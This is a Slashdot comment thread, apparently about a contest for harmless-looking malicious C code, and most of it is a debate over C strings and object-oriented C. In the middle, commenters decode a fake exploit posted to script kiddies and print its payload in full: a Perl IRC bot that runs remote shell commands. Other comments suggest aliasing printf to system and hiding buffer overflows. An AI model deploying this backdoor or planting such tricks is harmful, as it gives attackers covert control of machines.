Yes its design and implementation were (and still are, with GCC, an amazing compiler) scrutinized over, but that doesn't change the fact that it's still decades old technology. In the computer industry, I mean let's face it, it's a relic. I can't even believe major systems (like most modern operating systems) are still written in this.

This is a language that was designed initially to operate on computers with TELETYPE interfaces, forget even terminal let alone raster graphics. With BYTES of system memory and disk space, tiny little systems. No remote sense of complex data type checking (array bounds, etc), or automatic memory management, or anything remotely useful.

Two thousand years later, we're still building with concrete, stone, and brick like the Romans did. The basic building blocks never change. You want memory management and bounds checking? What language should your memory manager and bounds checker by written in? You think this high-level functionality springs fully formed from the CPU?

I dream of a language with the syntax and dynamics of python but with the compilation technology of common lisp. I'd love to write an OS in that language, on top of a highly optimised VM Microkernel, but with runtime introspection....MMM can anyone else say Lisp Machine style mechanics?

Hah! So you want to write an OS, but have someone else do all the heavy lifting for you, eh? Why not just ask for a language with an IDE that has a "Do" function in the Edit menu, right next to "Undo"! That way you can click "Do" and it'll spit out what you want into the editor frame!

Honestly, I'm not sure you understand the importance in an OS of interfacing with the hardware. This isn't a job you want to pawn off on the compiler with a bunch of canned, one-size-fits-all libraries. Not unless you want a crappy, slow, awkward OS.

Re:You're just not used to it.

[jonadab]

> A picky compiler is a blessing, not a curse. It's much easier to identify
> and fix compile errors than run-time errors.

This is true. A real problem with C compilation is not that it's picky, but that it takes so blasted long. I have no idea whether the other poster was alluding to this or not, but the change-compile-run cycle of C, for a project of any substantial size, using popular readily-available compilers (and here I am mostly thinking of gcc), is about three orders of magnitude longer than the leading high-level languages of today.

> Most people who don't like C are really just saying they don't like
> low-level programming because that's what it was designed for, and
> that's what it's perfect for. Too many newbie programmers get used to
> some modern, flash-in-the-pan, all-things-to-all-people languages and
> when they are faced with the challenges of low-level languages rashly
> conclude that it's the language's fault they're having problems.
> C is the perfect language for the job it was designed for. The same
> cannot be said for most more modern languages.

C is far from perfect, but it is well-suited to low-level programming, for things like boot loaders and schedulers and device drivers. The real reason a lot of us have decided we don't like C is because misguided people are using it for things it is *not* at *all* well-suited for, merely because it is ubiquitous, and we get exposed to it in that context. Frankly, 99% of the world's programmers today will never work on that kind of project, because almost all development is of higher-level applications that would be better developed in higher-level languages. (This was less true a few years ago, when performance was such a critical issue that people would pay twice as much for software that ran 20% faster on the same hardware, but these days, most applications can be written in higher level languages and will perform reasonably (as in, spend most of their time sitting there waiting on the user, the network, or a disk) on five-year-old hardware that sells for under a hundred bucks on ebay.)

Re:You're just not used to it.

In C you have nearly limitless control to write your code the way you feel is clearest. If it came out obfuscated then you have nobody to blame but yourself.

Typical lone geek programmer response. You have clearly never had to maintain a program written by someone whose idea of "clear" is significantly different from your own.

C is the perfect language for the job it was designed for.

I quite agree.

But the job it was designed for was the low-level implementation of an intentionally simplistic OS on hardware that was low-powered even by 1970s standards. It achieved that goal admirably, as you say, and has well deserved the praise that has been heaped on it for its simplicity, elegance, and power.

Some decades on, however, now that the average wristwatch has more processor power than a PDP and operating systems are no longer designed to work with less than 64 kb of memory, I believe it is no longer heretical to ask whether C may just have outlived its usefulness.

Re:You're just not used to it.

Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds?

Are you aware that the Linux kernel contains not just one, but two fully-functional tracing garbage collectors? There's one in JFS2 and another in the routing table/xform code.

Funny how people always get hung up about GC, when really it's all around them and they never even knew, because it the flaws they thought it had don't exist .

Re:You're just not used to it.

[Tyler+Durden]

Typical lone geek programmer response. You have clearly never had to maintain a program written by someone whose idea of "clear" is significantly different from your own.

I have had to maintain programs and expanded on code written by someone else in many languages. If the programmmer is good the code is clear, otherwise it is not. The language used has nothing to do with it.

The "simplistic" OS you refer to, of course, is UNIX. The simple design was so forward-thinking that more than thirty years later it is *the* OS to study for simplicity, consistency, extendability and elegance.

Very few kernels are written in anything but C even with the advances in hardware, and there's a good reason for that. Don't believe me? Then I encourage you to write a decent kernel in the langauage-of-the-hour of your choosing and prove me wrong.

Very very few projects of any interest today are written in anything but C/C++. The only exceptions I can think of are Azereus(Java), Bittorrent(Python), and Eclipse(Java). Everything else is a barren wasteland of simple IT automation, business enterprise applications or glue to piece together the interesting parts. *YAAAAAWWWWWNNN*

I mean, I see the point that C/C++ is used in many projects it shouldn't be. It's just that most of those project tend to bore the living shit out of me.

Re:You're just not used to it.

[swillden]

Unless C has changed since I last read K & R, C doesn't have classes. C is not an OO language.

typedef struct
{
uint16 length;
char* data;
} my_string;

my_string* init_string(const char* data, uint16 len);
void free_string(my_string* str);
my_string* string_cat(my_string* a, const my_string* b);
uint16 string_len(my_string* str);
/* ... */

There's nothing stopping you from creating classes in C. Inheritance and polymorphism are a bit painful, but you don't need those for simple types like strings, and you have to manually call "constructors" and "destructors", but that's not a big deal. For many excellent examples of OO code in C, see the Linux kernel.

Re:You're just not used to it.

[VAXcat]

I disagree...as a career assembly language programmer, it is often more convenient, smaller and faster, to have the length of something available for loading into a register, then loop through the array, auto-decrementing the register as you go, and stop when it hits 0, rather than doing a compare for 0 after each step through the array to see if you're done. Plus, it's kinda nice to be able to have strings with null characters in them...no can do in C.

Re:You're just not used to it.

[dcam]

I'm not. Not encoding the value at the start of the string causes poor performance (aside from security issues). What is more, given that C is a procedural language, there is no neat way to fix it (eg just define new class).

Re:You're just not used to it.

[dcam]

That is no class. Yeah you can hack together some C that looks kind of like a class, but that is no class. I've written some C like that also.

What you have requires that I "behave". There is no information hiding. It requires that I call only the functions you provide to manpulate the string.

Sure that is a better way to write C, but it is not OO programming and that is not a class.

Re:You're just not used to it.

[swillden]

What you have requires that I "behave".

The same is true of C++ code. It's always possible to do whatever you want to a given C++ object. The only difference is that in C++ it has to be somewhat more "intentional".

It requires that I call only the functions you provide to manpulate the string.

Likewise with C++. You can always manipulate the structure directly. If nothing else, there's always reinterpret_cast<>.

Sure that is a better way to write C, but it is not OO programming and that is not a class.

What is OO? That's actually a non-trivial question. Proponents of "pure" OO languages would argue that C++ isn't OO, either, since primitives and classes are not objects. If you take the OO-in-C constructs to their logical limit, you get polymorphism, a sort of inheritance, and can even implement just as much data hiding as C++ does.

Of course, I'd rather write it in C++, because the compiler takes care of so much bookkeeping. Plus C++ has a number of features that are quite difficult to implement cleanly in C, like exceptions, and I'm a huge fan of the very powerful static polymorphism provided by templates. After 15 years of writing C++, C feels... constraining.

But you certainly can implement OO designs in C, and the result can be as clean and elegant as anything in C++. As I said, read the Linux source for some excellent examples.

Re:You're just not used to it.

[dcam]

The same is true of C++ code. It's always possible to do whatever you want to a given C++ object. The only difference is that in C++ it has to be somewhat more "intentional".

This is more a question of degree. In C++, you can't do this without touching the source. What I mean is that if I hand you a class to use, unless you edit the code I have given you, you are limited to using the tools I have written and provide. In C there aren't the same constraints.

Likewise with C++. You can always manipulate the structure directly. If nothing else, there's always reinterpret_cast.

Once again, a question of degree.

What is OO? That's actually a non-trivial question. Proponents of "pure" OO languages would argue that C++ isn't OO, either, since primitives and classes are not objects. If you take the OO-in-C constructs to their logical limit, you get polymorphism, a sort of inheritance, and can even implement just as much data hiding as C++ does.

I do realise that. However I think that it is an accurate generalisation to call C++ an OO language and C a language that is not OO.

Plus C++ has a number of features that are quite difficult to implement cleanly in C, like exceptions, and I'm a huge fan of the very powerful static polymorphism provided by templates

Agreed. C++ remains my favourite language. At the moment I an coding mostly in C# and I and I particularly miss templates. That and not being able assign const members as part of the constructor. Oh and not having header files. Well designed headers are excellent documentation.

But you certainly can implement OO designs in C, and the result can be as clean and elegant as anything in C++. As I said, read the Linux source for some excellent examples.

It doesn't quite feel right. Sure it can be made to do it but it isn't what it is really designed to do it.

It just does not feel (to me) clean or elegant, in the same way that that same code implemented in C++ might feel.

Re:You're just not used to it.

You are wrong. You are probably thinking about things like protected and private, but they only function as a help to avoid doing stupid things. Nothing prevents you from working around them, and editing the header file isn't necessary.

Unless you have a runtime (like Java or .NET) or do some MMU tricks to make them really protected, nothing is going to prevent me from changing every private variable inside your class with a pointer and the correct offset.

Doing it deliberately is no harder than doing the same thing in C. Doing it on accident is a bit harder, since you don't just assign cl.privatevar.

But not much harder, since there's always the possibility of using the wrong offset for a pointer.

Re:You're just not used to it.

[swillden]

This is more a question of degree.

Precisely. There's no sharp line between languages that provide OO features and those that do not. In fact, you can implement OO designs in just about any language that provides function pointers.

In C++, you can't do this without touching the source.

Yes, I can. If I know what the internal structure is, I can get at it without modifying the code that defines it. Certainly if you use the "pimpl" pattern, and only provide me with binaries for the implementation, then I'd have a very hard time discovering the structure so as to be able to muck with it, but the pimpl pattern can be implemented in C also.

However I think that it is an accurate generalisation to call C++ an OO language and C a language that is not OO.

I agree with that generalization. But the post I originally responded to claimed that you can't create a string class in C, which is a completely different statement. C is not an OO language, but you can implement OO concepts in C, including polymorphism which is the core feature of OOD/P.

The discussion at hand was about whether or not C is expressive enough, and the complaint was that C-style strings are painful to use. My point is that C provides you enough flexibility to create strings that work in whatever way you'd like them to work, up to and including a string class that completely hides its implementation structure, provides reference-counting and copy-on-write, has polymorphic variants for strings with different growth characteristics or usage patterns (e.g. ropes), etc. And all of that can be done in a way which is only slightly more cumbersome to use than similar classes in C++.

Re:You're just not used to it.

[Fujisawa+Sensei]

Honestly, I'm not sure you understand the importance in an OS of interfacing with the hardware. This isn't a job you want to pawn off on the compiler with a bunch of canned, one-size-fits-all libraries. Not unless you want a crappy, slow, awkward OS.

Like the Amiga OS? IIRC it was written using SAS C++. ;-)

Re:You're just not used to it.

[dcam]

The discussion at hand was about whether or not C is expressive enough, and the complaint was that C-style strings are painful to use. My point is that C provides you enough flexibility to create strings that work in whatever way you'd like them to work, up to and including a string class that completely hides its implementation structure, provides reference-counting and copy-on-write, has polymorphic variants for strings with different growth characteristics or usage patterns (e.g. ropes), etc. And all of that can be done in a way which is only slightly more cumbersome to use than similar classes in C++.

I'd call it more than "slightly more cumbersome". I'd call it painful. I think that this just comes down to a difference of opinion. I think that it is painful to have to create structures of this sort and use them. I feel that doing this is using a pair of pliers to hammer in a nail. I guess you don't.

Oh and the other thing that bugs me about C# is that all expressions in a conditional expression are evaluated, rather than exiting as soon the answer is known. This just results in code bloat. eg:

if (Var is null)
{
if (Var.ToString().Length != 0)
{ // ....
}
}

Re:You're just not used to it.

[swillden]

I'd call it more than "slightly more cumbersome". I'd call it painful.

If you actually do it for a while you'll find that, in fact, it's not that bad. The worst part about it, IME, is that it encourages you to use shorter variable names because method invocations usually have to reference the object name twice, like:

object->an_operation(object, param1, param2);

Outside of that, the code looks a little different, but not all that much:

Object* object = build_object();
object->do_something(object);
ob ject->do_something_else(object);
object->destruct or(object);

Much of Linux uses a slightly different style where rather than putting function pointers directly in the object, they use an "ops" pointer that points to a structure full of function pointers. That makes the code look like:

object->ops->do_something(object);

It has the advantage of wasting less space because you can use one ops structure for a whole bunch of objects, and because it allows sets of functionality to be treated as blocks. It's really kind of cool in one way... unlike the normal C++ approach to methods, this allows you to dynamically redefine the behavior of an object, just by changing the ops pointer. You can do the same in C++, of course, but this structure naturally leads you toward the idea whereas C++ does not.

Really, it's not that bad to work with. In one way it's really nice, actually, in that nothing is hidden. In some cases that makes the code easier to think about.

Oh and the other thing that bugs me about C# is that all expressions in a conditional expression are evaluated, rather than exiting as soon the answer is known.

No short circuit evaluation? That does suck. I can see how someone might think it simplifies the language for dumb programmers, but real programmers have to hate it.

Re:You're just not used to it.

[dcam]

Really, it's not that bad to work with. In one way it's really nice, actually, in that nothing is hidden. In some cases that makes the code easier to think about.

I think you might be right. It is possible with more experience that this might feel rather more natural.

No short circuit evaluation? That does suck. I can see how someone might think it simplifies the language for dumb programmers, but real programmers have to hate.

Big time. Very annoying. C# also has a tendancy to be overly verbose, in a way that does not improve clarity. Short circuit evaluation is one of those areas. You also tend to end up with long statements:
SomeVar.SomeProp.SomeFunc()

This is exacabated by the fact that everything is class based. So you never have a plain constant, everything is class based. So to get a NULL value, you need:
DBNull.Value

Or for a carriage return:
Environment.NewLine
(as opposed to vbcrlf in vb)

The other area where this is annoying is the lack of templates (which mentioned before). Suppose you have a widget class. You want to store a collection of widgets (polymorphic, whatever), and you want to be able to add and remove items at will. Now you have two options, both relatively unsavoury.

1. Use an arraylist, which stores everything as an object, and so things must be cast back to their appropriate types when you pull them out. This is, in some ways, an accident waiting to happen because you don't know is acutally there, and need to handle the fact that, by mistake, a instance of class other than widget was pushed in.

2. Extend of the collection classes. I think that this is the recommended way. What is screwed about this is that you end up writing the same code again and again. Errors increase, and it is a waste of time. It does not increase clarity, and a slighly non-standard implementation of this might slip right under the radar. Microsoft: code duplication is bad mmkay?

I just don't think that 2 is a sustainable option, so I run with 1. What I really want are vectors, maps and the like.

Aside from that it is a pretty neat language. But I have to say, C++ is still my favourite language, particularly when you include the STL. It is just a pity I don't get paid to write it and I don't have the time to write it for recreation. I was working on an app that allowed you to do boolean searches of a collection of files. I haven't touched in a couple of years though :-(. Sitting at 1000 lines last time I touched it. This was before the release of the Google and MSN desktop search tools.

Re:You're just not used to it.

[dcam]

Acutally I'll have to take that back about short circuit evaluation. I'm not sure where I got the idea that it couldn't. I think I wrote some code assuming that it could and get exceptions thrown. I'll have to dig further to find out under what conditions this occurs or if I just made a mistake and attributed it to the wrong source.

Re:You're just not used to it.

[swillden]

But I have to say, C++ is still my favourite language, particularly when you include the STL.

Me, too. Of late I mostly write Java, when I'm not using a word processor, but every time I get to write C++ I find myself thinking "Damn! This is really nice!". I almost never recommend C++ when planning a project, though, because there aren't enough people around who know it and the learning curve is too steep to realistically expect people to pick it up on the fly while still being effective. So mostly I only write C++ on one-man projects that I won't have to turn over to someone else for maintenance.

BTW, your comment about how C# does do short-circuit evaluation led me to Google it, and it appears to me that you get to pick. If you use '&' or '|' then it always evaluates the full expression, but if you use '&&' or '||' (the Conditional Logical Operators) then it short circuits. I'm not sure there's a value in distinguishing, and it seems to me that it could lead to hard-to-see bugs where the programmer should have used '&&' but used '&' or vice versa. I'd probably enforce a stylistic rule that '&' was to be used only for bitwise operations unless a comment was added to point out the non short-circuit usage.

Re:You're just not used to it.

[ezeri]

And again your entirely missing the point. C is not a high level language. It's there when you want full control over every little thing your program is doing. Hand holding is a job for other languages, so when you need hand holding you can go use on of them. Or if you realy want to use C and want all the extra string features, write you own library or use one of the many freely availible.

Re:You're just not used to it.

[Dun+Malg]

Honestly, I'm not sure you understand the importance in an OS of interfacing with the hardware. This isn't a job you want to pawn off on the compiler with a bunch of canned, one-size-fits-all libraries. Not unless you want a crappy, slow, awkward OS.

Like the Amiga OS? IIRC it was written using SAS C++. ;-)

Ja, this is true, but one could hardly compare C++ with the ridiculous "build your own OS construction set" language the OP was describing. Programming an OS in C is like building a tractor hawing only a steel mill as a resource. C++ is like building one having access to a collection of industrial machine parts. The OP's absurd wish-language is like having an assembled tractor that comes in a box and you get to pick the seats, stereo, paint color, and the style of chrome wheels it gets. It's not building an OS, it's skinning one someone else built.

Re:You're just not used to it.

[Dun+Malg]

I disagree...as a career assembly language programmer, it is often more convenient, smaller and faster, to have the length of something available for loading into a register, then loop through the array, auto-decrementing the register as you go, and stop when it hits 0, rather than doing a compare for 0 after each step through the array to see if you're done. Plus, it's kinda nice to be able to have strings with null characters in them...no can do in C.

You disagree with what? Convenience, size, and speed are issues entirely unrelated to consistent behavior of data types. If you want to encode your C strings to include their own length in the first two bytes, there's nothing stopping you from doing it, just like in assembly. C strings aren't "broken"-- they fit neatly with the rest into the larger scheme of C's data handling. The point is, C treats strings like any other array of data, and if you want more than that you gotta do it your own dang self, or use a different language.

Re:You're just not used to it.

[VAXcat]

Read what I was replying to...the post I replied to stated that"C handles strings the same way assembly does". I'm telling you, assembly programmers don't handle strings the way C does...we want to load a count into a register, and then let the count decrement as the operations get done, rather than do compares for 0 at each step...using the sobgeq or sobgtr instruction after moving each byte, rather than having to beql to exit, or br back to the loop. Saves instructions, and keeps execution "in order". Also, assembly language programmers often like to move blocks of bytes around without worrying if there is a 0 "inband".

MOD PARENT DOWN.

this works fine on Linux (mandriva), Solaris, and HP-UX. Somebody already tried it on XP and said that it worked fine.

Open Source

[tsotha]

I've been wondering about this for quite awhile. In fact, it came up just recently when we were considering PasswordSafe at work. Ok, so it's open source and all, so I tell myself "self, it's probably not mailing my passwords back to Bruce Schneier. But being as you're kinda paranoid, maybe you should just get the source, audit it, then build from the audited source. That way you'll know everything's on the up-and-up."

But then I ask myself "but, self, what if the code is written by someone really clever, I mean somebody who's smart enough to use a buffer overrun or mangled pointer or some such to do it on the sly? Not smart like Einstein, but smart like, oh, Professor Moriarty?"

I'll be kinda curious if the entrants of this contest can write code that doesn't look like it's doing something sneaky, even if the exact mechanism isn't clear. It has practical implications for the security of open source.

Re:Open Source

[nsd20463]

Interesting that you bring up passwordsafe. The function that computes the test hash (used to check that the passphrase is correct) does not compute what it appears to compute. However I believe that it was an unintentional error and not deliberate obfuscation. I think the error wasn't caught becahse one random looking number is as good as another if all you're doing is checking for ==.

It wasn't until I independantly re-implemented the functionality that I discovered it. Because then I had to do what the code really did in order to be compatable.

Re:Open Source

[ZorroXXX]

But then I ask myself "but, self, what if the code is written by someone really clever, I mean somebody who's smart enough to use a buffer overrun or mangled pointer or some such to do it on the sly?

But even if the source is clean, you still have to trust the compiler. And you cannot actually do that unless you verify the source code of the compiler. But then you of course also have to verify the compiler that was used to compile the first compiler etc. And what about the operating system or processor. Can you really trust them?

So it boils down to that for some boundary you just have to trust whatever it is depending on.

Service Pack fixes it, but it's documented

[edalytical]

http://support.microsoft.com/?kbid=311486

Re:Service Pack fixes it, but it's documented

[Dun+Malg]

whateverdude. This problem was fixed with XP SP1 three years ago. If you're running pre-SP1 XP, you're already an idiot.

like they can find all the normal bugs??

As long as the people that are looking at the code are the same ones that can find all the "normal" bugs we should have nothing to worry about hear.

If all those eyes cant find blatant stupidity how are they going to find cleverness/true genious??

They wont.

Thanks for the technocrat pointer

[typical]

Actually, the headlines up there look interesting and more accurate than Slashdot's. I'll give it a try. Thank you.

Should I enter with this?

[krappie]

I started hanging out in this script kiddie channel on irc, and I'd always come back to seeing a bunch of messages from people asking for exploits.

So one day I decided to make something to give them.

The source can be downloaded here: http://brain.cx/winnuke2003.c

I didnt even really try... but it caused a huge ruckus when people started mass distributing it. It might not even work anymore.. eh..

Re:Should I enter with this?

[Sigma+7]

I started hanging out in this script kiddie channel on irc, and I'd always come back to seeing a bunch of messages from people asking for exploits.

So one day I decided to make something to give them.

The source can be downloaded here: http://brain.cx/winnuke2003.c

Something like that would get caught easily. It calls system(), with "chmod +x /tmp/hi 2>/def/null;/tmp/hi".

I didnt even really try... but it caused a huge ruckus when people started mass distributing it. It might not even work anymore.. eh..

Probably not, since it uses direct byte-code. I suspect it would only function on one specific platform at a given time.

Re:Should I enter with this?

[krappie]

Something like that would get caught easily. It calls system(), with "chmod +x /tmp/hi 2>/def/null;/tmp/hi".

You're right, im sure its not as sneaky as some of the submissions we are going to see in the contest. Also, my fake c code is so stupid, i just threw something together that compiled. Only idiots would be fooled by this.

Probably not, since it uses direct byte-code. I suspect it would only function on one specific platform at a given time.

Actually you're completely wrong here.. look closer

Re:Should I enter with this?

[lachlan76]

No it is not a binary, take a look at the code which i just decoded in the last 30 seconds.

#!/usr/bin/perl
$chan="#darknet";
$nick="moron";
$server="irc.prison.net";;;;
$SIG{TERM}={};
ex it if fork;
use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;
pri nt $sock "USER moron +i moron :moronv3\nNICK moron\n";
$i=1;
while(<$sock>=~/^[^ ]+ ([^ ]+) /)
{
$mode=$1;
last if $mode=="001";
if($mode=="433")
{
$i++;
$nick=~ s/\d*$/$i/;
print $sock "NICK $nick\n";
}
}
print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";
while(<$sock>)
{
if (/^PING (.*)$/)
{
print $sock "PONG $1\nJOIN $chan\n";
}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/)
{s/\s*$//;$_=`$_`;
foreach(split "\n")
{
print $sock "PRIVMSG $chan :$_\n";
sleep 1;
}
}
}
#chmod +x /tmp/hi 2>/dev/null;/tmp/hi

Sadly. IE not is not eligible

[anno1602]

They specifically say the code has to be readable and harmless-looking.

Re:NOT FUNNY: Chinese Hackers

I know you are, but what am I?

So weird

[Sloppy]

This kind of thing requires thinking that is so unlike typical programmer thinking. I'm sort of at a loss as to how I would approach this.

I can think of ways to make some harmless-looking code do harm, but it requires that somewhere else, there be some setup work that causes the harmless code to be harmful. You know, either some preprocessor crap, or function pointer abuse:
void (*printf)(char*);
printf=system;
But the setup would stick out like a sore thumb.

I'm sure some preprocessor masters and winners of the Obfuscated contest have ways to make that look less malevolent, but the problem with that, is that anytime I see lots of processor funkiness, that alone makes me really suspicous, whether I can figure out what it's doing or not. As an auditor/debugger, the preprocessor scares me. ;-)

Re:So weird

[zallus]

I really hope you never see a tricky LISP hack.

Re:So weird

[Sancho]

I would say you'd want to start with creating an intentional buffer overflow. Find a way to hide it so it's not horribly obvious as to what it is, but frankly, from some of the Open Source code you see out there, buffer overflows survive cursory glances at the code.

The hard part would be getting the malicious code in there, but a simple function that, passed with the correct parameters would do something good, would do something terrible with the wrong parameters. Perhaps deleting all files in a given directory (like /tmp) but with an override to give it another path to delete, which could then be munged on the stack. Code looks fine, but the "error" in it causes it to delete /tmp instead of /home.

Heck, you can cause a lot of havoc with a simple index error, like starting the count at 1 instead of 0.

I think this is more appropriate

[btarval]

Almost. All it takes is a one-line change to make this malicious program into what should be the motto of this contest:

main() { printf("Goodbye World!\n"); }

RealPlayer for the Win!

[HeXetic]

Submit the source code for RealPlayer 7 for the win!

This obvious joke has been brought to you by the ACME Obvious Joke Corporation, a division of -1 Unfunny entertainment.

Mod parent up

I hear Microsoft are going to enter Longhorn.

That's the spirit!

ROFLMAO

What does this do?

http://brain.cx/winnuke2003.c

OK, Root Beer for You

[billstewart]

Or Ginger Beer. Or non-alcoholic beers if you drink those.

Re:OK, Root Beer for You

[sp3tt]

Root beer, you do realize that it is horrible from a security point of view? Beer and running as root do not mix!

ROOT beer?

[Stephen+Samuel]

I don't drink beer (I generally don't drink alcohol, except for the occasional celebratory champaign). However, a good A&W root beer would do me fine.
I'm sure that there are others like me...

In Redmond...

[suitepotato]

...the prize seems to be you keep your job and get to work the next project. O.o

Seems like people have a harder time doing things like this on purpose once a year than doing them by accident on a daily basis.

says it causes access violation

It doesn't say it halts the system.

Re:says it causes access violation

[dadragon]

Yes, actually it does. From the link: As a result, Windows stops responding (crashes).

Vectors

[headkase]

Any program that was able to do two things would pass: The ability to load remote information into memory and to begin execution of the loaded information.
A way to automatically find this would be to use an execution tracer that would alert you when the programs point of execution "left" it's source code or allowed system api's.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Indeed. This could be a field day for Java and

[Justice8096]

Actually, Java uses low-level hooks into the host's UI routines. If you find a set of known problems in those routines, you have a malicious Java program.
And no, I haven't written one. But I have had to avoid those problems in my Java applications.

How's this for underhanded

[davidwr]

/ ***
remove this comment before sending
This code pretends to be released under the BSD license but is really from the GNU license.
Make sure Microsoft uses it in the next version of MS-Windows.
*** /

// note - get some obscure but useful GNU code and put it here

Volunteer to help out!

[real+gumby]

Clearly most of us should be submitting innocuous code to help camouflage the actual malign entries. That will make it harder for the judges to find badness. If you know that all the entries have some badness, then you'll look really hard. If you don't know which ones do, your checking gets worse.

This would make the test more like the real world too.

Step two

[Julian+Morrison]

...collect it all into a convenient library, for the use of sneaky b*stards.

I propose the name "libgood.so"

Obfuscation is never the answer.

[Feztaa]

I'd rather have a widely publicized contest showing many different ways of being sneaky with malicious code, so that those ways are known and can be checked for, than to trust in the ignorance of the malicious that they won't already know these techniques.

To phrase it differently: the malicious hackers already know all these tricks and secrets. By exposing them, we can protect ourselves.

I have 3 dots in obfuscate

[mister_llah]

Perhaps this will distract all the worm writers, malware creators, and other degenerates... but the question then becomes what is more enticing...

chaos... or beer?

===

I have to say... this is much more interesting, at least, than an "Obfuscated FoxPro" contest...

Inevitable nutcase

[epaga]

How about free p0rn instead of beer? MOD ME UP, BABY!

Prize Should Reflect Competition

[davidbofinger]

The prize should be absinthe, in a plastic bottle labeled "lime cordial".

C style strings

I used to program Pascal. You know what was the worst problem with that language? The strings had the size up front. This limits the string length to the highest value of the length "variable".

In Pascal the length was a byte. A string could contain 255 chars only. Useless for anything but simple writeline's.

Ok, you probably say, then lets make the size 16 bit (which makes the string into a struct, since the rest is still chars, ruining the simplicity of C). 16 bits. That's 64 kilobytes, and 64k should be enough for anyone, right? (or was it 640k).

Ok, you probably say, then lets make the size 32 bit. Other people made that mistake before, that's why we have O_LARGEFILE, to tell the system "oh, by the way, this file might be bigger than 2 GB).

Where everyone else is busy resizing their variables because they reached the limit they thought was big enough (remember Y2k?), C strings are only limited by the available memory. In 2050, C strings will still be able to hold however long text you throw at them, no matter how many exabyte stuff has grown to by then. (yeah yeah, won't happen, right? Remember when you could have the OS and word processor on the same floppy?).

As for "but I can't store a 0 (\0 in C)". No. How do you pronounce it anyway? Remember we are talking about text strings. If you want to store other things, don't use a text container, use something that's intended for it. Just don't expect the string functions to work on it, as they are meant for text strings.